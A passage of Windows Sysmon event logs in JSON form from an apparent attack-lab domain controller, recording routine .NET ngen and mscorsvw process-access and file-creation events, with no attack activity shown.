C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.981","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00104EE71100}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7879,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:10.997\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EA-5F25-0000-00104EE71100}\r\nTargetProcessId: 4836\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:10.997","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EA-5F25-0000-00104EE71100}","TargetProcessId":"4836","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7880,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.059\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EB-5F25-0000-001073EB1100}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.059","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EB-5F25-0000-001073EB1100}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7881,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.059\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EB-5F25-0000-001073EB1100}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.059","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EB-5F25-0000-001073EB1100}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7882,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.059\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EB-5F25-0000-001073EB1100}\r\nTargetProcessId: 4712\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.059","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EB-5F25-0000-001073EB1100}","TargetProcessId":"4712","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7883,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 06:00:11.590\r\nProcessGuid: {A837DB8D-04EB-5F25-0000-001073EB1100}\r\nProcessId: 4712\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1268-0\\System.Web.Extensions.Design.dll\r\nCreationUtcTime: 2020-08-01 06:00:11.590","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 06:00:11.590","ProcessGuid":"{A837DB8D-04EB-5F25-0000-001073EB1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1268-0\\System.Web.Extensions.Design.dll","CreationUtcTime":"2020-08-01 06:00:11.590","EventReceivedTime":"2020-08-01 06:00:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7884,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.637\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04EB-5F25-0000-0010AEF01100}\r\nTargetProcessId: 3272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.637","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04EB-5F25-0000-0010AEF01100}","TargetProcessId":"3272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7885,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.637\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04EB-5F25-0000-0010AEF01100}\r\nTargetProcessId: 3272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.637","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04EB-5F25-0000-0010AEF01100}","TargetProcessId":"3272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:00:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7886,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.653\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04EB-5F25-0000-0010AEF01100}\r\nTargetProcessId: 3272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:00:11.653","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04EB-5F25-0000-0010AEF01100}","TargetProcessId":"3272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:00:13","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:00:11","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7887,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:00:11.762\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04CD-5F25-0000-00108BBE1000}\r\nTargetProcessId: 2528\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: 